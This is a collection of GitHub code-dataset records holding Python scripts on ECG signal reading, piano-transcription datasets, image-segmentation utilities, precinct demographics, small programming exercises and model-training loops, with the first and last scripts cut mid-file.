channel_names: set the name of reading ECG signal, it must be a list, channel_names=['MLII'] means reading MLII lead\n channels: Set the number of ECG signals to be read. It must be a list. Channels=[0, 3] means to read the 0th and 3rd signals. Note that the number of signals is uncertain \n record = wfdb.rdrecord('../ecg_data/102', sampfrom=0, sampto = 1500) # read all channel signals\n record = wfdb.rdrecord('../ecg_data/203', sampfrom=0, sampto = 1500,channel_names=['MLII']) # Only read \"MLII\" signal\n record = wfdb.rdrecord('../ecg_data/101', sampfrom=0, sampto=3500, channels=[0]) # Only read the 0th signal (MLII)\n print(type(record)) # View record type\n print(dir(record)) # View methods and attributes in the class\n print(record.p_signal) # Obtain the ECG lead signal, this article obtains MLII and V1 signal data\n print(record.n_sig) # View the number of lead lines\n print(record.sig_name) # View the signal name (list), the lead name of this text ['MLII','V1']\n print(record.fs) # View the adoption rate\n '''\n \n record = wfdb.rdrecord(filePath,channel_names=[channel_names])\n if p_bIsVerbose:\n print('Number of lead lines:')\n print(record.n_sig) # View the number of lead lines\n print('Signal name (list)')\n print(record.sig_name) # View the signal name (list), the lead name of this text ['MLII','V1']\n\n '''\n Read annotation file\n sampfrom: Set the starting position for reading the ECG signal, sampfrom=0 means to start reading from 0, and the default starts from 0\n sampto: Set the end position of reading the ECG signal, sampto = 1500 means the end from 1500, the default is to read to the end of the file\n print(type(annotation)) # View the annotation type\n print(dir(annotation))# View methods and attributes in the class\n print(annotation.sample) # Mark the sharp position of the R wave of each heartbeat, corresponding to the ECG signal\n annotation.symbol #Mark the type of each heartbeat N, L, R, etc.\n print(annotation.ann_len) # The number of labels\n print(annotation.record_name) # The file name to be marked\n print(wfdb.show_ann_labels()) # View the type of heartbeat\n '''\n if p_bIsReadingAnnotations:\n annotation = wfdb.rdann(filePath,'atr')\n else:\n annotation = None\n# print(annotation.symbol)\n return record,annotation\n\nif __name__ == \"__main__\":\n from mllib.signals.multisignal import CMITMultiSignalRecording\n from mllib.visualization.multiseriegraph import CMultiSerieGraph\n oFilesAndChannels = {\"AccTempEDA\":[\"ax\",\"ay\",\"az\",\"temp\",\"EDA\"], \"SpO2HR\":[\"SpO2\", \"hr\"]}\n \n nMaxPersonNumber = 21\n \n DATASET_FOLDER = r\"G:\\MLDataSets.2022\\Physionet-Non-EEG Dataset for Assessment of Neurological Status\"\n \n oRecording = CMITMultiSignalRecording(DATASET_FOLDER, oFilesAndChannels, p_sFileFormat=\"Subject%d_%s\")\n for nPersonNumber in range(1, nMaxPersonNumber):\n oRecording.ReadRecording(nPersonNumber)\n #nSignalIndex = 6\n #draw_ecg_R(\"Subject %d channel %s\" % (nPersonNumber, oRecording.SignalNames[nSignalIndex]),oRecording.Signals[nSignalIndex],oRecording.Annotations)\n \n sTitle = \"Signals\"\n sCaptionX = \"Time\"\n sCaptionY = \"Value\"\n \n oGraph = CMultiSerieGraph()\n oGraph.Setup.LegendFontSize=10\n oGraph.Setup.Title = sTitle\n oGraph.Setup.CaptionX = sCaptionX\n oGraph.Setup.CaptionY = sCaptionY\n oGraph.Setup.CommonLineWidth = 1.5\n oGraph.Setup.DisplayFinalValue = True\n \n oSignalsToPlot = []\n oLabels = []\n for nSignalIndex in [4,5,6]:\n oSignalsToPlot.append(oRecording.Signals[nSignalIndex])\n 
oLabels.append(oRecording.SignalNames[nSignalIndex])\n \n oGraph.Initialize(oRecording.Time, oSignalsToPlot, oLabels, p_oPointsOfInterest=oRecording.Annotations)\n oGraph.Render(p_bIsMinMaxNormalized=True)\n oGraph.Plot()\n \n \nif False: \n import os\n IS_PLOTTING = True\n \n \n \n \n \n sCurrentChannel = \"EDA\"\n if sCurrentChannel in oFilesAndChannels[\"AccTempEDA\"]:\n sCurrentFileSuffix = \"AccTempEDA\"\n else:\n sCurrentFileSuffix = \"SpO2HR\"\n \n nMaxPersonNumber = 21\n \n DATASET_FOLDER = r\"G:\\MLDataSets.2022\\Physionet-Non-EEG Dataset for Assessment of Neurological Status\"\n \n for nPersonNumber in range(1, nMaxPersonNumber):\n SUBJECT_SIGNAL = \"Subject%d_%s\" % (nPersonNumber, sCurrentFileSuffix)\n \n sFileNameOnly = os.path.join(DATASET_FOLDER, SUBJECT_SIGNAL)\n record,annotation=read_ecg_data(sFileNameOnly, sCurrentChannel, sCurrentChannel in oFilesAndChannels[\"AccTempEDA\"])\n # draw_ecg(record.p_signal)\n print(record.sig_name)\n print(sFileNameOnly, record.p_signal.shape)\n \n \n if IS_PLOTTING:\n draw_ecg_R(\"Subject %d channel %s\" % (nPersonNumber, sCurrentChannel),record,annotation)\n if False:\n res=selData(record,annotation,'N',100)\n print(len(res))\n plt.plot(res[20])\n plt.show()","repo_name":"XarsEvandor/Machine-Learning","sub_path":"14. RNN/ReadSignalsDraft.py","file_name":"ReadSignalsDraft.py","file_ext":"py","file_size_in_byte":6519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23027834168","text":"import json\nimport os\nfrom abc import abstractmethod\n\nimport numpy as np\nimport pretty_midi\nimport soundfile\nimport torch\nfrom torch.utils.data import Dataset\nfrom tqdm import tqdm\n\nfrom constants import HOP_SIZE, MAX_MIDI, MIN_MIDI, SAMPLE_RATE\n\n\ndef allocate_batch(batch, device):\n for key in batch.keys():\n if key != 'path':\n batch[key] = batch[key].to(device)\n return batch\n\n\nclass PianoSampleDataset(Dataset):\n def __init__(self,\n path,\n groups=None,\n sample_length=16000 * 5,\n hop_size=HOP_SIZE,\n seed=42,\n random_sample=True):\n self.path = path\n self.groups = groups if groups is not None else self.available_groups()\n assert all(group in self.available_groups() for group in self.groups)\n self.sample_length = None\n if sample_length is not None:\n self.sample_length = sample_length // hop_size * hop_size\n self.random = np.random.RandomState(seed)\n self.random_sample = random_sample\n self.hop_size = hop_size\n\n self.file_list = dict()\n self.data = []\n\n print(f'Loading {len(groups)} group(s) of', self.__class__.__name__,\n 'at', path)\n for group in groups:\n self.file_list[group] = self.files(group)\n for input_files in tqdm(self.file_list[group],\n desc=f'Loading group {group}'):\n self.data.append(self.load(*input_files))\n\n def __getitem__(self, index):\n data = self.data[index]\n\n audio = data['audio']\n frames = (data['frame'] >= 1)\n onsets = (data['onset'] >= 1)\n\n frame_len = frames.shape[0]\n if self.sample_length is not None:\n n_steps = self.sample_length // self.hop_size\n\n if self.random_sample:\n step_begin = self.random.randint(frame_len - n_steps)\n step_end = step_begin + n_steps\n else:\n step_begin = 0\n step_end = n_steps\n\n begin = step_begin * self.hop_size\n end = begin + self.sample_length\n\n audio_seg = audio[begin:end]\n frame_seg = frames[step_begin:step_end]\n onset_seg = onsets[step_begin:step_end]\n\n result = dict(path=data['path'])\n result['audio'] = audio_seg.float().div_(32768.0)\n result['frame'] = frame_seg.float()\n 
result['onset'] = onset_seg.float()\n else:\n result = dict(path=data['path'])\n result['audio'] = audio.float().div_(32768.0)\n result['frame'] = frames.float()\n result['onset'] = onsets.float()\n return result\n\n def __len__(self):\n return len(self.data)\n\n @classmethod\n @abstractmethod\n def available_groups(cls):\n \"\"\"Returns the names of all available groups.\"\"\"\n raise NotImplementedError\n\n @abstractmethod\n def files(self, group):\n \"\"\"Returns the list of input files (audio_filename, tsv_filename) for this group.\"\"\"\n raise NotImplementedError\n\n def load(self, audio_path, midi_path):\n \"\"\"Loads an audio track and the corresponding labels.\"\"\"\n audio, sr = soundfile.read(audio_path, dtype='int16')\n assert sr == SAMPLE_RATE\n frames_per_sec = sr / self.hop_size\n\n audio = torch.ShortTensor(audio)\n audio_length = len(audio)\n\n mel_length = audio_length // self.hop_size + 1\n\n midi = pretty_midi.PrettyMIDI(midi_path)\n midi_length_sec = midi.get_end_time()\n frame_length = min(int(midi_length_sec * frames_per_sec), mel_length)\n\n audio = audio[:frame_length * self.hop_size]\n frame = midi.get_piano_roll(fs=frames_per_sec)\n onset = np.zeros_like(frame)\n for inst in midi.instruments:\n for note in inst.notes:\n onset[note.pitch, int(note.start * frames_per_sec)] = 1\n\n # to shape (time, pitch (88))\n frame = torch.from_numpy(frame[MIN_MIDI:MAX_MIDI + 1].T)\n onset = torch.from_numpy(onset[MIN_MIDI:MAX_MIDI + 1].T)\n data = dict(path=audio_path, audio=audio, frame=frame, onset=onset)\n return data\n\n\nclass MAESTRO_small(PianoSampleDataset):\n def __init__(self,\n path='data',\n groups=None,\n sequence_length=None,\n hop_size=512,\n seed=42,\n random_sample=True):\n super().__init__(path, groups if groups is not None else ['train'],\n sequence_length, hop_size, seed, random_sample)\n\n @classmethod\n def available_groups(cls):\n return ['train', 'validation', 'test', 'debug']\n\n def files(self, group):\n metadata = json.load(open(os.path.join(self.path, 'data.json')))\n\n if group == 'debug':\n files = sorted([\n (os.path.join(self.path,\n row['audio_filename'].replace('.wav', '.flac')),\n os.path.join(self.path, row['midi_filename']))\n for row in metadata if row['split'] == 'train'\n ])\n files = files[:10]\n else:\n files = sorted([\n (os.path.join(self.path,\n row['audio_filename'].replace('.wav', '.flac')),\n os.path.join(self.path, row['midi_filename']))\n for row in metadata if row['split'] == group\n ])\n files = [(audio if os.path.exists(audio) else audio.replace(\n '.flac', '.wav'), midi) for audio, midi in files]\n\n return files\n","repo_name":"juhannam/gct634-ai613-2021","sub_path":"hw3/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":5691,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"29589532248","text":"import torch\nimport numpy as np\nimport torch.nn as nn\nfrom skimage import filters\nimport torch.nn.functional as F\n\nclass AverageMeter(object):\n \"\"\"Computes and stores the average and current value\"\"\"\n def __init__(self):\n self.initialized = False\n self.val = None\n self.avg = None\n self.sum = None\n self.count = None\n\n def initialize(self, val, weight):\n self.val = val\n self.avg = val\n self.sum = val * weight\n self.count = weight\n self.initialized = True\n\n def update(self, val, weight=1):\n if not self.initialized:\n self.initialize(val, weight)\n else:\n self.add(val, weight)\n\n def add(self, val, weight):\n self.val = 
val\n        self.sum += val * weight\n        self.count += weight\n        self.avg = self.sum / self.count\n\n    def value(self):\n        return self.val\n\n    def average(self):\n        return self.avg\n\n\ndef unique(ar, return_index=False, return_inverse=False, return_counts=False):\n    ar = np.asanyarray(ar).flatten()\n\n    optional_indices = return_index or return_inverse\n    optional_returns = optional_indices or return_counts\n\n    if ar.size == 0:\n        if not optional_returns:\n            ret = ar\n        else:\n            ret = (ar,)\n            if return_index:\n                ret += (np.empty(0, bool),)\n            if return_inverse:\n                ret += (np.empty(0, bool),)\n            if return_counts:\n                ret += (np.empty(0, np.intp),)\n        return ret\n    if optional_indices:\n        perm = ar.argsort(kind='mergesort' if return_index else 'quicksort')\n        aux = ar[perm]\n    else:\n        ar.sort()\n        aux = ar\n    flag = np.concatenate(([True], aux[1:] != aux[:-1]))\n\n    if not optional_returns:\n        ret = aux[flag]\n    else:\n        ret = (aux[flag],)\n        if return_index:\n            ret += (perm[flag],)\n        if return_inverse:\n            iflag = np.cumsum(flag) - 1\n            inv_idx = np.empty(ar.shape, dtype=np.intp)\n            inv_idx[perm] = iflag\n            ret += (inv_idx,)\n        if return_counts:\n            idx = np.concatenate(np.nonzero(flag) + ([ar.size],))\n            ret += (np.diff(idx),)\n    return ret\n\n\ndef colorEncode(labelmap, colors):\n    labelmap = labelmap.astype('int')\n    labelmap_rgb = np.zeros((labelmap.shape[0], labelmap.shape[1], 3),\n                            dtype=np.uint8)\n    for label in unique(labelmap):\n        if label < 0:\n            continue\n        labelmap_rgb += (labelmap == label)[:, :, np.newaxis] * \\\n            np.tile(colors[label],\n                    (labelmap.shape[0], labelmap.shape[1], 1))\n    return labelmap_rgb\n\n\ndef accuracy(batch_data, pred):\n    (imgs, segs, infos) = batch_data\n    _, preds = torch.max(pred.data.cpu(), dim=1)\n    valid = (segs >= 0)\n    acc = 1.0 * torch.sum(valid * (preds == segs)) / (torch.sum(valid) + 1e-10)\n    return acc, torch.sum(valid)\n\n\ndef EPE(predicted_edge, gt_edge, sparse=False, mean=True):\n    EPE_map = torch.norm(gt_edge-predicted_edge,2,1)\n    if sparse:\n        EPE_map = EPE_map[gt_edge != 0]\n    if mean:\n        return EPE_map.mean()\n    else:\n        return EPE_map.sum()\n\ndef getEdge(batch):\n    from skimage.color import rgb2gray  # grayscale conversion (missing import in the original)\n    edgeslist=[]\n    for kk in range(batch.size(0)):\n        x=batch[kk]\n        # print(x.size()) \n        x=x.cpu().data.numpy()\n        if len(x.shape)>2:\n            x=np.transpose(x,(1,2,0))\n            x=rgb2gray(x)\n        edges = filters.sobel(x)\n        edgeslist.append(edges)\n    edgeslist=np.array(edgeslist)\n    edgeslist=torch.Tensor(edgeslist).cuda()  # tensors no longer need wrapping in autograd Variables\n    return edgeslist\n\n\n\n","repo_name":"xmichelleshihx/SLSDeep","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3662,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"21"}
{"seq_id":"70864687092","text":"\nimport pandas as pd\nimport geopandas as gpd\nimport json\n\n\n# Create a dataframe mapping block IDs to precinct IDs with appropriate types.\nwith open(\"data/unitmaps/blocks20-precincts.json\") as r: correspondence = json.load(r)\ncdf = pd.DataFrame.from_dict(correspondence, orient=\"index\", columns=[\"PRECINCTID20\"])\ncdf = cdf.reset_index().rename(columns={\"index\": \"GEOID20\"})\nfor c in list(cdf): cdf[c] = cdf[c].astype(str) \n\n# Read in block-level data; get total population and VAP data.\ndemographics = pd.read_csv(\"data/demographics/blocks20-P1.csv\")\ndemographicsVAP = pd.read_csv(\"data/demographics/blocks20-P3.csv\")\ndemographicsNHVAP = pd.read_csv(\"data/demographics/blocks20-P4.csv\").drop(\"VAP20\", axis=1)\n\ndemographics = demographics.merge(demographicsVAP, on=\"GEOID20\").merge(demographicsNHVAP, 
on=\"GEOID20\")\ndemographics[\"GEOID20\"] = demographics[\"GEOID20\"].astype(str)\ndemographics = demographics.merge(cdf, on=\"GEOID20\")\n\n# Keep only the things we want.\nkeep = [\n \"GEOID20\", \"PRECINCTID20\", \"TOTPOP20\", \"VAP20\", \"WHITEVAP20\", \"NHWHITEVAP20\",\n \"BLACKVAP20\", \"NHBLACKVAP20\", \"AMINVAP20\", \"NHAMINVAP20\"\n]\ndemographics = demographics[keep]\n\n# Group by precinct ID, then sum. Add rows for small, overlooked precincts.\naggregated = demographics.groupby(\"PRECINCTID20\").sum().reset_index()\naggregated[\"PRECINCTID20\"] = aggregated[\"PRECINCTID20\"].str.zfill(6)\n\n# Get geometries, then assign.\nprecincts = gpd.read_file(\"data/geometries/precinct20-elec.json\")\n\n# Merge demographic data.\nprecinctsDemo = precincts.merge(aggregated, on=\"PRECINCTID20\")\nprecinctsDemo[\"PRECINCTID20\"] = precinctsDemo[\"PRECINCTID20\"].astype(str).str.zfill(6)\n\ntry:\n print(\"Checking that we don't lose precincts after adding demographics: \", end=\"\")\n assert(len(precinctsDemo) == len(precincts))\nexcept:\n print(\"missed something.\")\n print(\"aggregated precincts:\", len(aggregated))\n print(\"geometric precincts:\", len(precincts))\n print(\"missing identifiers: \", set(precincts[\"PRECINCTID20\"]).symmetric_difference(set(aggregated[\"PRECINCTID20\"])))\n\nprint(\"didn't miss anything!\")\n\n# Write to file.\nprecinctsDemo.to_file(\"data/geometries/precinct20.json\")\n","repo_name":"pizzimathy/OK","sub_path":"geometries-aggregate-demographics.py","file_name":"geometries-aggregate-demographics.py","file_ext":"py","file_size_in_byte":2151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8046083694","text":"text = [\n 'A New Beginning In Your Life',\n 'Development, cooperation, and waiting',\n 'Social expansion and creative successes',\n 'Hard work and slow, but steady progress',\n 'Feeling Loose and Free',\n 'Love, Family, Home and Responsibility',\n 'a time for analysis and understanding',\n 'Attainment and capital gains',\n 'Reflection and Reaching Out'\n]\n\n\nif __name__ == '__main__':\n s = 'Hello world!'\n print(s[::-1])\n date = input(\"Birth date:\")\n while len(date) > 1:\n sum = 0\n for ch in date:\n if ch.isdigit():\n sum += int(ch)\n print(sum)\n date = str(sum)\n print(f'You number is: {date}')\n print(text[sum - 1])\n","repo_name":"iproduct/intro-python","sub_path":"fmi-2023-up-01/strings2.py","file_name":"strings2.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"71169639732","text":"class Node:\n def __init__(self, value):\n self.value = value\n self.next = None\n\n\nclass LinkedList:\n def __init__(self):\n self.head = None\n\n def insert(self, value):\n new_node = Node(value)\n if self.head is None:\n self.head = new_node\n else:\n new_node.next = self.head\n self.head = new_node\n\n def includes(self, value):\n current = self.head\n while current is not None:\n if current.value == value:\n return True\n current = current.next\n return False\n\n def to_string(self):\n if self.head is None:\n return \"NULL\"\n else:\n result = \"\"\n current = self.head\n while current is not None:\n result += \"{{ {} }} -> \".format(current.value)\n current = current.next\n result += \"NULL\"\n return result\nmy_list = LinkedList()\nmy_list.insert('a')\nmy_list.insert('b')\nmy_list.insert('c')\n\nprint(\"Linked List: {}\".format(my_list.to_string()))\n\nprint(\"Includes 'b': 
{}\".format(my_list.includes('b')))\nprint(\"Includes 'd': {}\".format(my_list.includes('d')))","repo_name":"Sakherr/drf-api","sub_path":"data-structures-and-algorithms/linked-list/linked_list.py","file_name":"linked_list.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13426363361","text":"#\n#\n#\ndef GetEmpName():\n empname = input(\"Enter employee name: \")\n return empname\n#write the GetHoursWorked function\ndef GetHoursWorked():\n hours = float(input(\"Enter total hours: \"))\n return hours\n\n\n#write the GetHourlyRate function\ndef GetHourlyRate():\n hourlyrate = float(input(\"Enter hourly rate: \"))\n return hourlyrate\n\n# write the GetTaxRate function\ndef GetTaxRate():\n taxrate = float(input(\"Enter tax rate (in %): \"))\n return taxrate\n\n\ndef CalcTaxAndNetPay(hours, hourlyrate, taxrate):\n grosspay = hours * hourlyrate\n incometax = grosspay * taxrate\n netpay = grosspay - incometax\n return grosspay, incometax, netpay\n\ndef printinfo(empname, hours, hourlyrate,grosspay, taxrate, incometax, netpay):\n print(empname, f\"{hours:,.2f}\", f\"{hourlyrate:,.2f}\", f\"{grosspay:,.2f}\", f\"{taxrate:,.1%}\", f\"{incometax:,.2f}\", f\"{netpay:,.2f}\")\n\ndef PrintTotals(TotEmployees, TotHours, TotGrossPay, TotTax, TotNetPay): \n print()\n print(f\"Total Number Of Employees: {TotEmployees}\")\n print(\"TotHours:\", hours)\n print(\"TotTax:\", incometax)\n print(\"TotGrossPay:\", grosspay)\n print(\"TotNetPay\", netpay)\n print()\n\n\nif __name__ == \"__main__\":\n TotEmployees = 0\n TotHours = 0.00\n TotGrossPay = 0.00\n TotTax = 0.00\n TotNetPay = 0.00\n\n while True:\n empname = GetEmpName()\n if (empname.upper() == \"END\"):\n break\n hours = GetHoursWorked()\n hourlyrate = GetHourlyRate()\n taxrate = GetTaxRate() \n grosspay, incometax, netpay = CalcTaxAndNetPay(hours, hourlyrate, taxrate)\n printinfo(empname, hours, hourlyrate, grosspay, taxrate, incometax, netpay)\n\n TotEmployees += 1\n TotHours += hours\n TotGrossPay += grosspay\n TotTax += taxrate\n TotNetPay += netpay\n\n\n\n\n PrintTotals (TotEmployees, TotHours, TotGrossPay, TotTax, TotNetPay)\n","repo_name":"BamaBoy8807/CIS-261_Course-Project_Jeff-Woosley","sub_path":"CIS_261_Course_Project_Jeff_Woosley.py","file_name":"CIS_261_Course_Project_Jeff_Woosley.py","file_ext":"py","file_size_in_byte":1897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3727977160","text":"class Solution:\n def maxProduct(self, words: List[str]) -> int:\n ele_dict = {}\n for indx , val in enumerate(words):\n bit_map = 0\n for char in val:\n bit_map |= 1 << (ord(char) - ord('a'))\n ele_dict[indx] = bit_map\n \n max_word = 0\n for indx in range(len(words)):\n\n for inner in range(indx + 1 , len(words)):\n\n if ele_dict[indx] & ele_dict[inner] == 0:\n product = len(words[indx]) * len(words[inner])\n max_word = max(max_word , product)\n\n return max_word\n","repo_name":"zerabruck/Competitive-programming","sub_path":"A2sv/maximum_product_of_word_lengths.py","file_name":"maximum_product_of_word_lengths.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24405194777","text":"import cv2\r\nimport numpy as np\r\n\r\na = input(\"Enter name of image = \")\r\n\r\n\r\nimg = cv2.imread(\"muskan.jpg\")\r\n\r\nr, c = img.shape[:2]\r\n\r\nm = np.float32([[1, 0, 100], [0, 1, 
100]])\r\n\r\nnew_img = cv2.warpAffine(img, m, (c, r))\r\n\r\ncv2.imwrite(\"a.jpg\", new_img)\r\n\r\ncv2.imshow(\"translation\", new_img)\r\ncv2.waitKey(0)\r\n\r\ncv2.destroyAllWindows()\r\n","repo_name":"DEEPESH98/OpenCV","sub_path":"openCV_Project/new_1.py","file_name":"new_1.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43037826967","text":"def main():\n n = int(input())\n S = []\n T = []\n for _ in range(n):\n s, t = input().split()\n S.append(s)\n T.append(t)\n\n ans = 'No'\n for i in range(n):\n for j in range(i+1, n):\n if (S[i] == S[j]) and (T[i] == T[j]):\n ans = 'Yes'\n break\n\n print(ans)\n\n\nmain()","repo_name":"batamorphism/coding","sub_path":"Python/AtCoder/old/ABC216-B.py","file_name":"ABC216-B.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17614763394","text":"import os, sys\nimport numpy as np\nimport torch\nimport pytorch_lightning as pl\nfrom six.moves import cPickle\nfrom evoaug import evoaug\n\nsys.path.append('../../evoaug_analysis')\nimport utils\nfrom model_zoo import CNN\n\n\ndevice = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n\noutput_dir = '../results/chipseq'\nutils.make_directory(output_dir)\n\n\nexpt_names = ['GABPA', 'MAX', 'BACH1', 'REST', 'SRF', 'ZNF24', 'ELK1']\nnum_trials = 5 \n\nfor expt_name in expt_names:\n\n data_path = '../data'\n filepath = os.path.join(data_path, expt_name + '_200.h5')\n data_module = utils.H5DataModule(filepath, batch_size=100, lower_case=True)\n\n\n trial_results = []\n for trial in range(num_trials):\n\n cnn = CNN(data_module.y_train.shape[-1]).to(device)\n loss = torch.nn.BCELoss()\n optimizer_dict = utils.configure_optimizer(cnn, \n lr=0.001, \n weight_decay=1e-6, \n decay_factor=0.1, \n patience=5, \n monitor='val_loss')\n\n robust_cnn = evoaug.RobustModel(cnn,\n criterion=loss,\n optimizer=optimizer_dict, \n augment_list=[])\n\n # create pytorch lightning trainer\n ckpt_path = expt_name+\"_baseline_\"+str(trial)\n callback_topmodel = pl.callbacks.ModelCheckpoint(monitor='val_loss', \n save_top_k=1, \n dirpath=output_dir, \n filename=ckpt_path)\n callback_es = pl.callbacks.early_stopping.EarlyStopping(monitor='val_loss', patience=10)\n trainer = pl.Trainer(gpus=1, max_epochs=100, auto_select_gpus=True, logger=None, \n callbacks=[callback_es, callback_topmodel])\n\n # fit model\n trainer.fit(robust_cnn, datamodule=data_module)\n\n # load checkpoint for model with best validation performance\n model_path = os.path.join(output_dir, ckpt_path+'.ckpt')\n robust_cnn = evoaug.load_model_from_checkpoint(robust_cnn, model_path)\n\n # evaluate best model\n pred = utils.get_predictions(robust_cnn, data_module.x_test, batch_size=100)\n results = utils.evaluate_model(data_module.y_test, pred, task='binary') \n\n # store results\n trial_results.append(results)\n\n # save results\n with open(os.path.join(output_dir, expt_name+'_baseline.pickle'), 'wb') as fout:\n cPickle.dump(trial_results, fout)\n\n\n ","repo_name":"p-koo/evoaug_analysis","sub_path":"analysis/main/chip_baseline.py","file_name":"chip_baseline.py","file_ext":"py","file_size_in_byte":2787,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"18984589405","text":"from __future__ import print_function\nfrom extractTrain import search, myfile\nimport logging\nimport os.path\nimport 
sys\nimport re\nimport codecs\n\n#reload(sys)\n#sys.setdefaultencoding('utf8')\ndef main1():\n\tfolder = r\"/Users/mac/Documents/LearnPython/KeywordExtraction/data/SemEval2010/train\"\n\tfilters = ['C','H','I','J']\n\t# filters = ['C']\n\tallfile = []\n\tallfile = search(folder, filters, allfile)\n\tfile_len = len(allfile)\n\tprint('Found %d abstract files' % (file_len))\n\tfor f in allfile:\n\t\tcur_name = os.path.basename(f)\n\t\tletter = os.path.basename(f)[0]\n\t\tfor i in range(2, len(os.path.basename(f))):\n\t\t\tif os.path.basename(f)[i] != '.':\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tnumber = int(os.path.basename(f)[2:i])\n\t\t\t\tbreak\n\t\toutput_file = open('../data/SemEval2010/train_removed/%s-%d.txt' % (letter, number), 'w', encoding='utf-8')\n\t\twith open(f, 'r', encoding='utf-8') as curf:\n\t\t\tfor line in curf.readlines():\n\t\t\t\tss = re.sub(\n\t\t\t\t\t\"[\\s+\\.\\!\\/_,;\\[\\]><•¿#&«»∗`={}|1234567890¡?():$%^*(+\\\"\\']+|[+!,。?;:、【】《》“”‘’~@#¥%……&*()''\"\"]+\", \" \", line)\n\t\t\t\tss += \"\\n\"\n\t\t\t\toutput_file.write(\"\".join(ss.lower()))\n\n\t\toutput_file.close()\n\n\ndef main2():\n\tprogram = os.path.basename(sys.argv[0])\n\tlogger = logging.getLogger(program)\n\tlogging.basicConfig(format='%(asctime)s: %(levelname)s: %(message)s')\n\tlogging.root.setLevel(level=logging.INFO)\n\tlogger.info(\"running %s\" % ' '.join(sys.argv))\n\tif len(sys.argv) != 3:\n\t\tprint(\"Using: python filter.py xxx.txt xxxx.txt\")\n\t\tsys.exit(1)\n\tinp, outp = sys.argv[1:3]\n\toutput = codecs.open(outp, 'w', encoding='utf-8')\n\tinp = codecs.open(inp, 'r', encoding='utf-8')\n\ti = 0\n\tfor line in inp.readlines():\n\t\t# ss = re.sub(\"[\\s+\\.\\!\\/_,;-><¿#&«-»=|1234567890¡?():$%^*(+\\\"\\']+|[+——!,。?;:、【】《》“”‘’~@#¥%……&*()''\"\"]+\".decode(\"utf-8\"), \" \".decode(\"utf-8\"),line)\n\t\t# ss = re.sub(\"[\\s+\\.\\!\\/_,;\\[\\]><•¿#&«»∗`{}=|1234567890¡?():$%^*(+\\\"\\']+|[+!,。?℃;:、【】《》“”‘’~@#¥%……&*()''\"\"]+\", \" \",\n\t\t# \t\t\tline)\n\t\tss = re.sub('[。,:;、1234567890()]+', '', line)\n\t\t# ss += \"\\n\"\n\t\t# output.write(\"\".join(ss.lower()))\n\t\toutput.write(ss)\n\t\ti = i + 1\n\t\tif (i % 10000 == 0):\n\t\t\tlogger.info(\"Saved \" + str(i) + \" articles\")\n\t# break\n\toutput.close()\n\tinp.close()\n\tlogger.info(\"Finished removing words!\")\n\ndef my_write(begin_write, cur_line, output_name):\n\t\tif begin_write:\n\t\t\tout_file = open(output_name, 'a', encoding='utf-8')\n\t\t\tout_file.write(cur_line)\n\t\t\tout_file.close()\n\ndef get_content():\n\tinp = open('../data/raw/SemEval2010_train_raw.txt', 'r', encoding='utf-8')\n\tbegin_write = False\n\tlines = inp.readlines()\n\tfor line in lines:\n\t\tif 'ABSTRACT' in line:\n\t\t\tbegin_write = True\n\t\t\tcontinue\n\t\tif 'REFERENCES' in line:\n\t\t\tbegin_write = False\n\t\t\tcontinue\n\t\tmy_write(begin_write, line, '../data/SE2010_content.txt')\n\tinp.close()\n\n\nif __name__ == '__main__':\n\tmain2()\n\t#get_content()\n\t# f1 = open('../data/raw/SemEval2010_train_raw.txt', 'r', encoding='utf-8')\n\t# f2 = open('../data/SE2010_content.txt', 'r', encoding='utf-8')\n\t# print(len(f1.readlines()))\n\t# print(len(f2.readlines()))\n\t# f1.close()\n\t# f2.close()","repo_name":"NoteXYX/KeywordExtraction","sub_path":"scripts/filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":3161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"22756429217","text":"import os\nimport math\nimport json\nimport numpy as np\nimport pandas as pd\n\nimport collections\nimport 
torch\n\ndef data_split(rootDir, filename):\n \n select_ID=pd.read_csv(filename)\n select_ID.drop(select_ID[select_ID['FILE_ID']=='no_filename'].index, inplace=True)\n select_ID.drop(select_ID[select_ID['func_mean_fd']>=0.2].index, inplace=True)\n \n data = os.listdir(rootDir)\n \n data_set = collections.defaultdict(list)\n annot_data_set = collections.defaultdict(list)\n\n \n list_data = []; data_path = []; data_path_full = []\n for i in data:\n folder_list = []; path_list = []; path_list_full = []\n for j in os.listdir(os.path.join(rootDir, i)):\n for k in os.listdir(os.path.join(rootDir, i, j)):\n if k.split('.')[-1] == 'gz':\n path_list.append(k.split('func_preproc')[0])\n path_list_full.append(os.path.join(rootDir,i,j,k))\n list_data.append(folder_list)\n data_path.append(path_list)\n data_path_full.append(path_list_full)\n index = []; ASD_annotations = []; TC_annotations = []; genre = []; ASD = []; TC = []\n \n for j,i in enumerate(data_path[2]):\n for l,k in enumerate(select_ID['FILE_ID'].values):\n if i == (k + str('_')):\n if select_ID['DX_GROUP'].values[l]==1:\n ASD_annotations.append(0) #ASD\n ASD.append(j)\n if select_ID['DX_GROUP'].values[l]==2:\n TC_annotations.append(1) #TC\n TC.append(j)\n 